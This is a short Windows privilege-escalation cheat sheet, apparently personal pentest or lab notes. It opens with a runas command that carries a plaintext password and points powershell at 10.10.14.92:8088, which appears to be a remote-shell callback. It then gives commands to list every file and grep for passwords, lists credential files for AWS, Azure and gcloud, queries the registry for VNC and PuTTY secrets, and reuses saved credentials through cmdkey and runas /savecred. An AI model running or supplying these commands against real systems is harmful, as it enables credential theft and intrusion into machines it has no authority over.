switch users using:
\runas.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.92:8088
File Enumeration:
File check:
dir /b /a /s C:\ > dirs.txt - list all dirs and files
type dirs.txt | findstr /i passw - find docs with passwords
Potentially attactive file types:
certificates:
gpg, pgp, p12, der, csr, cer
keys:
pem, ppk, idrsa, id_dsa
backup files:
bak, backup, log
Executable:
bat, cmd, vbs
Config:
conf, cnf, ini, xml
VPN/ RDP:
ovpn, vnc, ssh, rdg (mRemoteNG), ftp, .git, .env (docker)
Potentially attractive files:
unattend.xml
sysprep.inf
sysprep.xml
VARIABLES.dat
setupinfo
setupinfo.bak
web.config
Sitelist.xml
.aws/credentials
.azure/accesstokens.json
.azure/azureprofile.json
gcloud/credentials.db
gcloud/legacycredentials
gcloud/access_token.db
Registry Enumeration:
Registry search:
reg query HCKU /f WORD /t REG_SZ /s
reg query HKLM /f WORD /t REG_SZ /s
Potentially interesting Registry:
Run with 'reg query "REG"'
HKCU\Software\ORL\WinVNC3\Password
HKCU\Software\TightVNC\Server
HKCU\Software\SimonTatham\PuTTY\Session
HKCU\Software\SimonTatham\PuTTY\Session\local
HKCU\Software\OpenSSH\Agent\Keys
HKCU\Software\
Credential Manager:
cmdkey /list
runas /savecred /user:SAVED_USER powershell.exe
cms.ps1; enum-creds
